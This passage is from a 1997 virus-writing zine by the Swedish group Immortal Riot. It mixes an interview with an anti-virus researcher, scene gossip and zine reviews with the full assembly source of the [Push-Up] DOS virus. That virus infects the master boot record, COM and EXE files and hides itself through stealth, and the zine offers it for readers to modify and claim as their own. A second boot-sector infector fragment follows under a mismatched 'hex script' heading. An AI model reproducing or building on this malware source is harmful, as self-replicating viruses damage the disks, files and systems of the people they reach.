> "just drop, it's a waste for everyone", motivate why.. ).
here is what i would say:
you may think it is cool to see how this stuff works, just like it is cool to
know about other computer actions and who can argue with you? not me.
but there is no 'magic' or technological 'excellence' in this stuff. its not
'new science'. its not any way to get a good job. what it can be is some very
costly pasttime. there can be a big price to pay -- you can really hurt someone
with the viruses, because you can not guarantee that you can control the
viruses.
people will say you cant *really* hurt anyone, but they are wrong.
so please stop and think what you are doing. if you are the kind of guy who
wants to hurt them, then you deserve what you may get if you do it.
[how many words was that?]
> about your article "the generic viruswriter", the four persons you
> selected for the four groups, who were they? (if you can't give
> this out, don't, but motivate why.. ).
sorry but that is confidential to them. why? i told them it will be
confidential unless they tell me otherwise when i asked for people to
respond to the survey.
> which virus-related article is your personal favorite?
> (why is that..).
general systems theoretical model for av protection (if you mean my own).
it is favorite because it allowed me to work in new area. or do you mean
in general?
> what, concerning virus-related stuff have you regretted in your
> life?
i regret that i did not realise the personal dynamics of my relationship
with the virus writer formerly known as dark avenger, and that i was
sometimes too concerned with my personal life to give attention
to him when he needed it. but it was really wearing me out, and i actually got
physically ill from spending too much time with all the work. i did not realise
the impact this all would have on him, or on me.
it took alot of my time and attention for several years.
i have written a lot about how we dont realise the impact of our actions
on others, since the computers can tend to desensitize us. unfortunately,
i was not 'immune' to this .
> do you prefer tea or coffee in the morning?
grape kool-aid (dont you attend defcon? :)
> your favorite dish?
prawn crackers, any hot chinese dish with chicken.
> what're your hobbies? (umm.. one hobby.. many hobbies??).
hobbies? i think you need spare time to have those..
i used to sail and did at one time train and ride my own horse, but
i had to give him away when i could not afford to keep him. i also dont
have my sunfish sailboat anymore. i have recently tried to do some oil
painting, but lost interest in it. i guess i dont really have any hobbies.
do you?
> who did you vote for in the president election - 96?
i did not vote.
> do you think the "virus-infections-problems" will die out
> and fade away with the OSes getting more common, dos losing
> ground, etc? and in how long time if yes..
i think this depends on how you define 'problems' :)
> you sell f-prot professional, what other av-products would
> you recommend for the average user?
the 'best' product for any job depends on the needs of
the user as well as the product. any product which is wildlist compliant
is a good 'starting place' for the user. from there, he will need to factor
in his individual needs.
> about f-prot pro & not-registrated, what are the differences?
i have did a comparison for the Command web site...you can see
the differences there! (can you tell i'm getting tired? :)
> how does your typical monday-friday day look like?
> (are you satisfied with your current life?).
get up. drink kool-aid. (ok, coffee:). log-on while drinking coffee.
answer mail. answer questions about viruses :). answer more questions
about viruses :). (answer this mail). look at viruses :). look at more
viruses :). try to spend some time researching new topics. answer more
questions about and look at more viruses (usually macro viruses).
am i satisfied? no. are you?
> what plans (irl/computer) do you have for the future?
irl, i want to buy a house and a dog :) have a garden and volunteer
some time someplace meaningful.
for computer, i am thinking maybe ill write some new software, maybe
automate some tests which take a lot of my time now, and probably design
a new CSecurity model.
> do you prefer a dog or a cat? (not for dinner.. pet :)).
hey, how did you guess? i have a cat but he lives with my friend. i could
not bring him to florida. he loved his house too much. so now i dont have
any pet. but hope to have both.
well ..since i wrote this, i have bought
another dog, he is not yet named, and is still at the pet store ..but
i will be bringing him home soon.
[since i wrote this (yet another edit :)), the dog from the pet store got
sick. so we got yet another dog. our third. this one we named 'lucky'. i
hope he is :)]
> about viruswriting groups, a lot of us has faded out and died
> recently, anything you want to say to them or to the one's that
> still remains?
i'd be interested to talk to anyone who wants to talk seriously about
viruses.
> do you consider viruswriting to be a perverted hobby?
never did. waste of time. probably unethical from a formalised ethical
modeling point of view (if you're Kantian :). can be illegal. but
perverted? thats funny :) . have you seen the Internet lately?
lets keep things in perspective. i work hard to help users avoid problems
from viruses, and feel people need to take active steps to help stop
virus distribution. im against indiscriminate virus distribution, and
think that as a society we should not overtly or tacitly condone it.
but there are far worse problems facing our society. this is not to
say viruses are 'no problem'. they sure are! but in the 'big picture' there
are far worse problems facing computer users and society in general than
the viruses we are seeing today.
it is the viruses which i have chosen to fight, and i wont stop fighting
against them because it is wrong to make software which hurts people or
which has the potential to hurt people. computers should be used for
helping people, used for good ethical purposes. now, can you and i
talk about why you write viruses and distribute them in your magazine?
because i think it is wrong. you can argue that what people decide to do with
them is their own business and not your fault, but actually if you didnt
give them the viruses, you wouldnt have a role in their using them for bad.
as it stands now, you are partly responsible for what they do with what
they do with your creation. why not create something which uses the computer
to help people, something they can chose to use and thank you for instead?
===============================================================================
IRL-Papers
~~~~~~~~~~
I've seen a lot of write-up's concerning computer-viruses lately but
since they're all in swedish and me being a bad translator I'm sorry
I didn't translate them all for you.
If you know some swedish though the page to be on is:
http://www.qainfo.se/artiklar_om_virus.htm (or .html dunno).
One article called "Virus Buster" is located on
http://www.idg.se/cs/artiklar/1996/77/cspe/b10a/b10a.htm (or .html dunno)
which's featuring a picture of Klas (S&S Sweden) Sch”ldstr”m "which makes
life hard for those who got the idea to create and distribute computer
viruses" (He's defintitly geeky looking, check for yourself!).
Some quote's from that articles (published in Computer Sweden #77,
Friday the 6 of Dec, 1996) follow though (scene-person related, go
bitch on him or so..) here.
"Last spring, the virus Boza came, that was the first
virus for Win/95. But it sucked. It can only infect
files in the same directory from where it was executed
from and it fails doing it sometimes. It was though
a media-hype (or PR-trick) from the virus-authors
to be first with a 32-bits-virus".
(Now, he also diss the hare virus claiming it's only halts the computer
and that he consider macro-viruses the real danger..).
Furthermore, they write (which could be interesting in this zine ;)).
"Klas consider a virus named One-Half to be among the most naughty one's
he's ever seen. - At the occations I've seen a virus spread itself
to many computers at one time, it's one-half, he says. "It's made
hard to detect and has no bugs. It places itself on the
"partition-sector" (direct-translation -tu) and slowly starts to
encrypt the harddrive. When half of the hd is encrypted the message
"Dis is one half. Press any key to continue" is displayed and at
that time, also back-up's is encrypted.
(Klas starts his sector-editor (which he wrote himself%!) and takes
us a journey trough One Half and its functions.. w-o-w- ;)).
(Now, he says we're all kids who seems to love computers, yet are
trying to fuck them up and thereby are really hating them..)
.SE 10 top wild list
--------------------
Junkie.1027 (boot/file)
Form.a (bootvirus)
Antiexe (bootvirus)
Beijing (bootvirus)
AntiCMOS (bootvirus)
Grangrave.1150 (filevirus (Burglar/H I wrote av against btw! - tu :))
One-Half (boot/file)
WM.Concept (macro-virus)
Empire Monkey (bootvirus)
Ripper (bootvirus)
Well.. In case you're interested!
================================================================================
THE HORROR
~~~~~~~~~~
Since I forgot to include this code in the VLAD april fool's edition,
here follow [Push-Up] (v. early beta!) written ages and ages ago by someone
who surely indeed will turn red-hot-chily-red when seeing this ;).
The code is as unoptimized as can be ;) and there are labels and check's
w/o corresponding code :-). Double-code inclusion is included for your
own sake! You -should- be able to optimize this and feel like an asm-wiz!
As shitty old tradition we supply you with un-finished
viruses for you to modify and claim your very own creation!
Also, as we say in Sweden "a laugh extends your life", so... I guess
you'll be like really old after looking closely into this one.
Anyways the basic thought for this virus was good since I consider a
bs/mbr/com/exe semi-stealth virus an alright replicator. The virus should
work, but I guess that's about it, probably not perfectly under all
configurations and stuff.
To assemble: Tasm /m9 filename.asm
To link : tlink /t filename.obj
- Moi!
.model tiny
.code
org 100h
resid = 5234h
bs_marker = '��' ;our mbr/bs marker (love me)
;or (me love...)
century = 100 shl 1
vsize = (vend-vstart)
mem_para= ((vend-vstart)/16)+1
mem_kb = ((vend-vstart)/1024)+1 ;the memory in kb's+1
vsect = ((vend-vstart)/512)+1 ;number of sectors occupied
host_start:
jmp short vstart ;jmp to virus code
db 0 ;pad byte, just for jmp to
;compile 3 bytes
;Real virus-code begin at this entry....
vstart:
call $+3 ;call next instruction
mov di,sp ;move the stackpointer into di
mov bp,word ptr ss:[di] ;load bp with the word at ss:[di]
sub bp,offset $-5 ;sub $ - 5 from it and get
;relocation offset in BP
;This is probably to fewl anti-virus
;"heuristic" general signature
;scanning. Might be outdated though.
mov ax,ds ;ax=psp
add ax,10h ;10h=psp size
add word ptr cs:[bp+csip+2],ax ;fix jmp far (segment) to hosts code
add word ptr cs:[bp+spss],ax ;fixup real stack segment (for exe's)
push ds cs cs ;save ds so we can restore it, if exe
pop ds es ;ds=cs=es
mov ax,resid ;ax := 5234h
mov bx,resid ;bx := 5234h
int 13h
cmp ax,cx ;ax/bx/cx=5234h ?
jne infect_mbr ;
jmp return_to_host ;Assume that if resident then
;the mbr must already be infected
;===============================================================================
; int13h: Useful input: ; output
; if function sucessfull
; Write Sector ; ah = 00h
; ah = 03h ; al = # of sectors written
; al = # of sectors to write
; ch = cylinder ; if function NOT ok
; cl = sector ; CF = set
; dh = head ; ah contains status
; dl = drive ; (not equal to 00)
; - 00-7fh floppy disk
; - 80-ffh fixed disk
; es:bx = segment:offset of buffer
; Note: The same goes for ah=2 (sector read).
;===============================================================================
infect_mbr: ; <- Virus isn't resident!
mov ax,201h ; => Read the first sector of drive
lea bx,[bp+iobuf] ; C: (80h) to iobuf via function
mov cx,1 ; ah=2 / int 13h al = # of sectors
mov dx,80h ; to read
int 13h
mov ax,301h ; function ah=3 = sector write
mov cx,2 ; Write es:bx (iobuf) to sector 2.
int 13h ; on drive C: (dx=80h).
mov word ptr [bp+iobuf],03cebh ;insert jmp to our bootstrap, not
;necessary in mbr infections...
lea si,[bp+mbr_bs_code] ;load si with code that will be
lea di,[bp+iobuf+03eh] ;written to the sectors
mov cx,mbr_bs_size+2 ;(+2 due to marker)
cld ;clear direction
rep movsb ;store the mbr loading code in the org
;mbr(iobuf) and without destorying
;the partition table
mov ax,301h ;Write iobuf (boot-loading code and
mov cx,1 ;partition table to sector on on the
int 13h ;hd
mov ax,300h+vsect ;vsect = # of sectors occupied by virus
lea bx,[bp+vstart] ;main virus code to sector 3
mov cx,3 ;aim at sector 3
int 13h ;sector write
go_resident:
;this goes resident via mcb's.... but only executed
;when started from exe/com file, else there is another routine...
pop es ;restore es to psp due to res-check...
push es ;save es for later use
mov ax,es ;es=Program Segment Prefix
dec ax ;
mov ds,ax ;ds=Memory Control Block
xor di,di ;zero di
cmp byte ptr ds:[di],'Z' ;last MCB?
jne return_to_host ;if not last mcb-block, bail
sub word ptr ds:[di+3],mem_para ; allocated memory
sub word ptr ds:[di+12h],mem_para
mov es,word ptr ds:[di+12h]
push cs ; cs=ds
pop ds
xor di,di ; copy virus to TOM
push di ; save di = 0
lea si,[bp+vstart] ;
mov cx,(vsize/2)+1 ; size of virus in words
cld ; clear direction (to inc DI & SI)
rep movsw ; copy virus up there
pop ds ;ds=0
push ds ;save ds on the stack
lds ax,ds:[21h*4] ;get int21h segment:offset adress
mov word ptr es:[o21-vstart],ax ;directly from the ivt's adress
mov word ptr es:[o21-vstart+2],ds
pop ds ;load ds from the stack
mov word ptr ds:[21h*4],(i21-vstart) ; set new interrupt 21h handler
mov word ptr ds:[21h*4+2],es ; to point to our virus code
push ds ; do the same thing, but this time
lds ax,ds:[13h*4] ; fix interrupt 13h
mov word ptr es:[o13-vstart],ax
mov word ptr es:[o13-vstart+2],ds
pop ds
mov word ptr ds:[13h*4],(i13-vstart)
mov word ptr ds:[13h*4+2],es
mov byte ptr es:[i13-vstart],0f9h ;put a STC there so no re-hook
;of interrupt 21h is being
;performed
mbr_already_infected: ;since mbr already infected
;the virus should be resident
;either via mbr or file...
return_to_host:
pop ds ;restore ds
push ds
pop es ;es=ds=psp
cmp byte ptr cs:[bp+infection_type],0 ;if infection_type = 0
je com_return ;it's a com-file, else
;assume exe-file
exe_return:
cli ;disable maskable interrupts
mov sp, word ptr cs:[bp+spss+2] ;during ss/sp modifictions
mov ss, word ptr cs:[bp+spss] ;
sti ;recognize interrupt again
xor ax,ax ;clear ax before stating host
;and...
db 0eah ;jmp far ptr org_exe cs:ip
csip dd 0 ;exe-hosts original cs:ip
spss dd 0 ;exe-hosts org ss:sp
com_return:
mov di,100h ;com-file starts at cs:100h
push di ;save di at 100h
;so we return to cs:100h
;once we do a 'RET'
lea si,[bp+offset org_com] ;original 3 bytes stored
movsw ;in org_com is copied
movsb ;from source ds:si to
;destination es:di
ret ;ret to 100h
mbr_bs_code: ;this code is written to
;infected disks mbr/bs
mov si,7c00h
xor ax,ax
cli ;disable maskable interrupts
mov ss,ax ;ss=0
mov sp,si ;sp=7c00h
sti ;set stack to (sp:sp) 0:7c00h,
;just below our current cs:ip
mov ds,ax ;cs=ds=0
allocate_memory_via_bios:
sub word ptr ds:[413h], mem_kb ;subtract bios-memory with
;virus size in kilobytes
int 12h ;get memory from bios (kb's)
;output in ax
mov cl,6
shl ax,cl ;really a ax/1024
mov es,ax ;es=segment of _non-existing_
;memory (memory allocated for
;virus-code)
xor dh,dh ;zero dh
cmp dl,80h ;check if it's hdd0, (dl=80h)
je mbr_start ;then it is a mbr start
floppy_start: ;This code seems to be
;pretty unfinished. I wonder
;how floppies are being taken
;care off.
mbr_start:
xor bx,bx
mov ax,200h+vsect
mov cx,3
push dx ;save drive
int 13h ;read vsect number of sectors
;with start at sector 3 of
;hd into vir_seg (es)
push ds ;ds=0
lds ax,ds:[13h*4] ;get int 13h's vector
mov word ptr es:[o13-vstart],ax
mov word ptr es:[o13-vstart+2],ds ;save int 13h's vector
pop ds
mov word ptr ds:[13h*4],(i13-vstart)
mov word ptr ds:[13h*4+2],es ;set int 13h to point to es:i13
push ds ;ds=0
push es
mov dx,(load_mbr_bs-vstart)
push dx
retf ;jmp to es:dx, our vir_seg
;and our code to load
;the real mbr/bs
mbr_bs_size = $-mbr_bs_code ;size of mbr/bs code -2
dw bs_marker
load_mbr_bs:
pop es ;es=0
mov ax,201h ;read sector 2 to
mov bx,7c00h ;es:bx = 0000:7c00h
mov cx,2 ;sector # = 2 (saved_code)
pop dx ;dx=80h
int 13h ;load the real mbr/bs from
;sector 2 where we stored it
;(see proc infect_mbr)
push es
push bx
retf ;jmp to 0:7c00h and execute the
;real bs/mbr
i13:
clc ;changed to a stc when int 21h
;is hooked
jc got_i21 ;if we have int21h, don't check
;for exe files being exec'd
;(int21h not yet set)
cmp es:[bx],'ZM' ;check for first EXE file to be
jne got_i21 ;loaded
hook_i21: ;hook interrupt 21h from
push ds ax ;the bs/mbr code
xor ax,ax
mov ds,ax ; ds = 0
push ds
lds ax,ds:[21h*4]
mov word ptr cs:[o21-vstart],ax
mov word ptr cs:[o21-vstart+2],ds
pop ds
mov word ptr ds:[21h*4],(i21-vstart)
mov word ptr ds:[21h*4+2],cs
pop ax ds
mov byte ptr cs:[i13-vstart],0f9h ;puts a stc at i13
;(so we recognize it's hooked!)
got_i21:
res_check:
cmp ax,resid ;instalation check cmp ax,5234h
jne check_stealth_bs_mbr ;not equal check next function
cmp bx,resid ;ax = res_chk check check
jne check_stealth_bs_mbr ;bx for same value
mov cx,resid ;if ax & bx = 5234h, load
iret ;cx with it, too and return
check_stealth_bs_mbr:
cmp cx,1 ;check ANY int13h function
jne org13 ;for "track 0, sector 1" (or so)
cmp ah,2 ;check for sector-read w/int13h
je stealth_mbr_floppy ;sector_read on sec#1 = stealth!
cmp ah,3 ;write to sec#1 ?
je stealth_mbr_floppy ;redirect that, too.
org13: db 0eah ;jmp far ptr ORG13h
o13 dd 0 ;segment:offset adress
ret ;if we call org13h, return
;to proper adress...
stealth_mbr_floppy:
cmp dx,80h
ja org13 ;it's not drive C: = bail
jb floppy_stealth ;(floppy stealth is not yet
;implemented, it seems)
mbr_stealth:
inc cx ;redirect read/write to sector2
;where the orig_mbr is stored
call org13
dec cx ;CX = not altered
retf 2 ;return
floppy_stealth:
jmp short org13
;===============================================================================
; INTERRUPT 21H HANDLER
; ---------------------
; ax = 5234h = Used for resident-call via int21h
; ah = 4bh = Execute, infect.
; ah = 11h = Find first file via FCB. Decrease file_size increases
; ah = 12h = Find next file via FCB.. Decrease file_size increases
; ah = 4eh = Find first file via file handle. Decrease size increases
; ah = 4fh = Find next file via file handle.. Decrease size increases
;===============================================================================
i21:
cmp ax,resid ;if ax = 5234h, return
jne _4b ;that value to bx, too
mov bx,resid ;and return.
iret
_4b: cmp ax,4b00h ;infect on file_execute
je infect
_11: cmp ah,11h ;file stealth
jne _12
jmp Stealth_FCB
_12: cmp ah,12h ;file stealth
jne _4e
jmp Stealth_FCB
_4e: cmp ah,4eh ;file stealth
jne _4f
jmp Stealth_Handle
_4f: cmp ah,4fh ;file stealth
jne org21
jmp Stealth_Handle
org21: db 0eah ;jmp far ptr
o21 dd 0 ;segment:offset to saved int21h
ret ;in case of a call, return.
infect:
push ax bx cx dx di si ds es ;save register in use
mov cx,64
mov al,'.'
mov di,dx
cld
repne scasb
cmp word ptr [di-3],'RI'
jne go_on1 ;alter this to a "je go_on1" to
;test this w/o infecting
;files!
no_open_jmp:
jmp no_open
go_on1:
mov ax,3d82h ;open file in read/write mode
int 21h
jc no_open_jmp ;error open => bail
xchg ax,bx ;place filehandle in BX
push cs cs
pop es ds ;es=ds=cs
mov ax,5700h ;get file's date/time stuff
int 21h
cmp dh,century ;if it century marked,
jb read_first ;assume infection by us, else
jmp restore_td ;bail..
read_first:
push cx dx ;save date/time stamp
mov ah,3fh ;read first 18h bytes of
mov dx,(exeheader-vstart) ;file to a buffer called
mov cx,18h ;"exeheader" in this source.
int 21h
mov ax,4202h ;seek EOF and get filesize
xor cx,cx ;returned in dx/ax
cwd
int 21h
cmp dx,0 ;check for "valid" file-sizes
ja large_enough ;ie. not too big/small.
cmp ax,vsize
ja large_enough
pop dx cx ;restore time/date
jmp restore_td
large_enough:
cmp word ptr ds:[exeheader-vstart],'ZM' ;is it an exefile ?
je infect_EXE
cmp word ptr ds:[exeheader-vstart],'MZ' ;is it an exefile ?
je infect_EXE
Infect_COM: ;since we ONLY infect on
;execute, if a program is
;executed by DOS and not
;exe, assume .COM!
mov byte ptr ds:[infection_type-vstart],0 ;mark com-infect=on
sub ax,3 ;ax=fsize
mov word ptr ds:[new_com-vstart+1],ax ;store jmp to v-code
mov cx,3
mov dx,(new_com-vstart)
push cx dx
EXE_continue: ;exe_infection will reach
;this entry later
write_virus:
mov ah,40h ;function ah=40h, write to
mov cx,vsize ;file cx=bytes.
cwd ;ds:dx=buffer to write from
int 21h ;bx=filehandle
cmp byte ptr ds:[infection_type-vstart],0 ; check for com_infect
je write_first_bytes ; equal, write first bytes!
mov ax,4202h ;else, continue to infect
xor cx,cx ;an executed EXE
cwd
int 21h ;<- Seek end of file
mov cx,512 ;Convert size to 512-byte
div cx ;pages
or dx,dx
jz no_increasment
inc ax
no_increasment:
mov word ptr ds:[exeheader-vstart+2],dx ; Insert new filesize
mov word ptr ds:[exeheader-vstart+4],ax ; into EXE header
write_first_bytes: ; Goto TOF and
mov ax,4200h
xor cx,cx
cwd
int 21h
mov ah,40h ;write header-info
pop dx cx ;cx=3 if com, 18h if exe
int 21h
pop dx cx ;restore time/date stamp from
add dh,century ;stack. Mark with another
;100 years...
restore_td: ;<- Restore_time_date
mov ax,5701h ;but add 100 years..
int 21h
close: ;Close file
mov ah,3eh
int 21h
no_open:
pop es ds si di dx cx bx ax ;restore segment/registers
jmp org21 ;and return to int21h
Infect_EXE:
mov byte ptr ds:[infection_type-vstart],1 ;mark exe-infect
mov di,(csip-vstart)
mov si,(exeheader-vstart+14h)
movsw
movsw ;save original cs/ip
mov si,(exeheader-vstart+0Eh)
movsw
movsw ;save original ss/sp
mov cx,10h
div cx ;dx:ax (fsize/10h) = para's
sub ax,word ptr ds:[exeheader-vstart+8] ;sub headersize
mov word ptr ds:[exeheader-vstart+14h],dx ;Set starting CS:IP
mov word ptr ds:[exeheader-vstart+16h],ax ;to end of EXE
add ax,100h
mov word ptr ds:[exeheader-vstart+0Eh],ax
mov word ptr ds:[exeheader-vstart+10h],100h
mov cx,18h
mov dx,(exeheader-vstart)
push cx dx
jmp EXE_continue
;===============================================================================
; DIR-STEALTH ROUTINE
;===============================================================================
; 11/12/4e/4fh stealth routines are so common and generic these days,
; so it's for no reason to comment them. Similar routines can
; be found in for example ir-mag#7.zip (reality.013).
Stealth_FCB:
pushf
push cs
call org21
or al,al
jnz FCB_error
push ax bx es
mov ah,51h
int 21h
mov es,bx
cmp bx,es:[16h]
jnz no_stealth
mov bx,dx
mov ax,[bx]
push ax
mov ah,2fh
int 21h
pop ax
inc al
jnz not_extended
add bx,7
not_extended:
mov ax,word ptr es:[bx+19h]
cmp ah,century
jb no_stealth ;not century marked...
sub ah,century
mov word ptr es:[bx+19h],ax
; cmp word ptr es:[bx+1dh],vsize ;Skip all file_size checks
; ja fcb_stealth ;because it's pretty unlikely
; cmp word ptr es:[bx+1fh],0 ;that any other file is
; je no_stealth ;marked with + 100 years.
fcb_stealth:
sub word ptr es:[bx+1dh],vsize
sbb word ptr es:[bx+1fh],0 ;size stealth done...
no_stealth:
pop es bx ax
FCB_error:
iret
;==============================================================================
; Stealth on dir7's directory listenings, or other program which uses
; 4e/4fh for operating.
;==============================================================================
Stealth_Handle:
pushf
push cs
call org21
jc handle_error
pushf
push ax bx es
mov ah,2fh
int 21h
mov ax,word ptr es:[bx+18h]
cmp ah,century
jb no_stealth_
sub ah,century
mov word ptr es:[bx+18h],ax
; cmp word ptr es:[bx+1ah],vsize
; ja stealth2
; cmp word ptr es:[bx+1ch],0
; je no_stealth_
stealth2:
sub word ptr es:[bx+1ah],vsize
sbb word ptr es:[bx+1ch],0
no_stealth_:
pop es bx ax
popf
Handle_Error:
retf 2 ;don't change flags...
vname db '[Push-Up] v0.001á ' ;virusname & version
EGO_tag db '(C) 1995 Immortal Riot (Sweden)' ;group & origin
infection_type db 0 ;0=COM,1=EXE
new_com db 0e9h,0,0 ;new host bytes, if com(our jmp)
exeheader:
org_com db 0cdh,20h,0 ;original hosts bytes, if com
db 16h dup (0) ;exe-header...
vend:
heap:
iobuf db 512 dup(?) ;a buffer for the original boot-record
heap_end:
end host_start
===============================================================================
If You have no tasm and still wan't to look into this, cut out this
hex script to a file and do:
debug es=cs :)
pop es
mov ax, 0201h ; Try to read squezed sector
xor dx, dx ; from drive 0, head 0
mov cx, 5101h ; track 81, sector 1
lea bx, last ; to buffer above virus
int 13h
; jnc infbx
mov ax, 0504h ; Format track with 4 sectors
lea bx, fdata ; Offset to sector table
int 13h
jc infbx ; Skip if unsuccessful
mov ax, 0201h ; Read boot sector
lea bx, last ; Offset to buffer above virus
mov cx, 1 ; First sector
int 13h
mov ax, 0301h ; Save boot on squezed sector
mov cx, 5101h ; Track 81, sector 1
int 13h
mov ax, 0303h ; Write virus to squezed sectors
mov cl, 02h ; Track 81, sector 2-4
mov bx, 100h ; Offset of virus start
int 13h
mov word ptr last, 03CEBh ; Put jump in boot sector
mov di, offset last+03Eh ; Offset to code in boot sector
mov si, offset bootstrap ; Offset to bootstrap routine
push cs ; Set ds to our memory
pop ds
mov cx, strapsize ; Size of boot routine
cld ; Clear direction flag
rep movsb ; Copy boot routine to boot sector
mov ax, 0301h ; Write new bootsector
mov cx, 0001h ; to track 0, sector 1
lea bx, last ; bx to buffer
int 13h
infbx:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
ret
infectboot endp
fdata db 81,0,1,2 ; Sector layout on squezed track
db 81,0,2,2 ; Format is:
db 81,0,3,2 ; [track,head,sector,size]
db 81,0,4,2 ; sizes: 0=128,1=256,2=512,3=1024
v13: ; ISR for interrupt 13
cmp ah, 2 ; Sector read?
je v13acc
cmp ah, 3 ; Sector write?
jne v13ex
v13acc: or dx, dx ; Drive 0, head 0
jnz v13ex
cmp cx, 1 ; Boot sector?
jne v13ex
mov ch, 81 ; Redirect to track 81
int 13h
mov ch, 0
jnc v13ex
int 13h
v13ex:
db 0EAh
i13o dw ?
i13s dw ?
grp_tag db 'IR' ; as in Immortal Riot!
bootstrap: ; Code to be put in boot sector
push cs
pop ds
sub word ptr ds:[413h], 2 ; Decrease system memory
int 12h
mov cx, 40h ; Convert to paras
mul cx
sub ax, 10h
mov es, ax
push ax
mov ax, 0203h ; Read 3 sectors
mov bx, 100h
mov cx, 5102h ; track 81, sector 2
xor dx, dx ; on drive 0, head 0
int 13h
mov bx, offset install ; Jump to code
push bx
xor ax, ax
mov es, ax
retf
strapsize equ 1+$-offset bootstrap
install:
push ax ; Save return position
mov ax, 0201h ; Read original boot sector
mov bx, 7C00h ; to standard position
push bx
mov cl, 01h ; from sector 1 on track 81
int 13h
push es
pop ds
mov ax, word ptr ds:[4Ch] ; Get interrupt vector
mov cs:i13o, ax
mov ax, word ptr ds:[4Eh]
mov cs:i13s, ax
mov word ptr ds:[4Ch], offset v13
mov word ptr ds:[4Eh], cs ; Set interrupt vector
retf ; Jump to original boot sector
last:
end first
================================================================================
Side-effects the conversation way
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This was suppose to be a short summery of what good side effects viruswriting
might have. I can't exactly say what you consider being a positive effect of
something, but most stuff thought of is negative which of course leads us to
a position where it's hard to motivate viruswriting. This mean that this
is an important issue to deal with if some of your irl 'friends' all sudden
start wondering why the fuck you're doing it and you have'll to defend your
rights.
Well, you probably have thought about a few good reasons yourself,
if you need reasons that is. I said I couldnt give any good reasons
to viruswriting stated in the interview published above ;).. Hm, that is
definitly to simplify it, but it's for a time a fun thing to do.
>Fun? Is it fun to write something with evil intension? Is it fun to
>make a bomb?
Well, bombs are interesting, but please don't compare those things.
When I said "fun", I ment "interesting". Yes, it is interesting to
program things. It's interesting to develop code with an unique
capability - to self-replicate. It's interesting to meet other people
similar yourself and it's interesting and fun to see other people
solution and learn from them. The coding itself is just a must to be
accepted by the people who I talk with.
>But why viruses?
Well, do you find any other programs that has the same impact on
users than viruses? It's fun to know much about something that not
too many people know much about.
>So.. it's all about having respect then?
No, it's not. I won't discuss this with most people, only with those
who're concerned. Plus, I like having knowledge if some smartass
need to be "taken care of", but since I dislike physical violence,
I find my computer skills somewhat useful.
>So, then you distribute your code to people you dislike?
No. I didn't say you did now did I?
Defence is easy. Just bore them to death and voila, you'll win.
The conversation above *was* boring and due to that, I won't
write anymore on it. The conversation above wasn't about
side-effects at all. Gotcha. As stated somewhere, stay tuned
and it will be presented. Not here though. Ha-Ha.
Scene-Zines.
~~~~~~~~~~~~
Recently, I've seen a lot of zines/groups popping up and while some
has faded away. Well, some say the scene is dying but I think not. Only
the "good old virus groups" are. Rabid is dead (hehe!), P/S is, NuKE is RIP,
YAM, TridenT, DY, VG and so on are (Not much of news, most people don't even
know about some jam ;)) but! there's 'always' new groups coming up some who're
really good.. and yea.. Immortal Riot is still around and will be for quite
some time.. Don't expect a fade out!
The funny thing with virus-groups is that we do release a shitload of
zines. A short summary of the scene-zines might be in order here
(If I've forgotten one or two.. that is only because I'm tired,
but since I dislike to sleep... deal with it)
40hex
-----
What I heard P/S died and won't put out any more 40hex issues.
Well, most 40hex zines did include things one still can
look on and learn from so if you miss them, re-read and study
an old one :).
VLAD
----
It's sad Qark and Quantum gave the entire virus-thing up, but we'll
see what Darkman (who have been outta it recently) can do with it.
I miss them ;) seeing my name appear in the greetings to each
issue (hehe!) and those games included. After metabolis gave up
vlad they lost a little of their "personality". Qark was very good
as organiser, too bad (for us) he got tired of it and desided to drop
the entire thing. Good luck in life guys!
INSANE REALITY:
---------------
After our merge with Genesis we finally brought out an issue
and in my opinion a very interesting issue, too. Beside the overall
code-quality (maybe too high for most) it included a lot of other good
non-coding material. Thanks are due to Dark Fiber for doing a lot of work
for us!
Also worth to mention is that Sepultura and Rajaat put a lot of effort in
doing it as good as possible. I heard people complained and gave us
negative feedback, yet I can't understand why.
There isn't much news in IRG (what I know of anyways) issue#9 is under
development and you can if you consider yourself worthy contribute to it.
Expect to see a high quality issue!
29#A
----
Vlad-stylish group from Spain(?) I wish good luck in the future. Had
some interesting things in issue #1 and we can always hope it
remains stable and evolve.
Computa-Gangsta
---------------
Issue #1 isn't really worth bitching on here. But, it's a first issue
and I won't bitch on newcomers. We all started somewhere...
STEALTH.
--------
Does contain a lot of complex & interesting stuff. Maybe better commented
viruses would increase the "overall quality" though. From russia
with love :).
PLASMA
------
DC is gone. Might have formed another group called RSA. Can be interesting to
see what Wild Worker and co. can do with his crew (RSA). (I know he wasn't
"pres" but he should be).
SVL
---
Good luck guys! I surely will enjoy reading this zine! It's quality
(besides this article!) poeple expect from you. Hope there will
be a issue #2!
NuKE
----
Has been dead for several years now, still there is some newbee's
on irc asking for VCL2. Don't do that, it's annoying as hell and
you'll most likely be kicked or banned two seconds after you
pressed enter. So read my lips: NuKE is dead!
iKX
---
Seems to be an interesting group, including b0z0 and guys. They did
contribute to Insane Reality #8 and Sailor Moon is an interesting
virus.
Minotaurus
----------
Dunno if the spelling is correct or not ;). They should though
write their stuff in english if they're around (haven't seen
much lately though).
So.. there's actually a shitload of groups out there, producing code.
Hang around long enough on irc #virus and you'll see them sometime.
Greets
~~~~~~
There's so many people to greet really. I would like to thank everyone
who have been there for me, on the irc, on email and on the phone.
Further greets goes to anyone who won't take this contribution
any seriously. I promised to include something and I try to keep my
promises. ok?
Thanks to all I ever have done a /msg to, and yea.. IRG guys.. keep
it up!
Rest in Peace
~~~~~~~~~~~~~
Terminator-Z - Farewell.
Credits
~~~~~~~
The Unforgiven. - Main article writer.
Dark Fiber. - First Sarah Gordon interview.
Well, that's it (if not specified somewhere else).
Goodbye's and cya somewhere.. somehow.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vlad.Au. Keep on emailing me.
Quotation & Poetry
~~~~~~~~~~~~~~~~~~~
Just read my mind and find the complete guide to insanity.
Should be trivial if you belong to the second foundation.
Personally I dunno about what choice I would made. First,
Second or Gaia.. Hm, tricky. But.. who really want to make
choices. That sucks. I just want it all :). Quotation of the
day: "Even if I'm wrong, doesn't make you right!".
Future
~~~~~~
I will continue hanging on the irc, writing my stupid articles
and just float around being what I've been. If you found this article chaotic,
you're right that was the idea if I might add that. For IRG, the future is as
bright as always.
Happy Valentine and 1997.
The Unforgiven.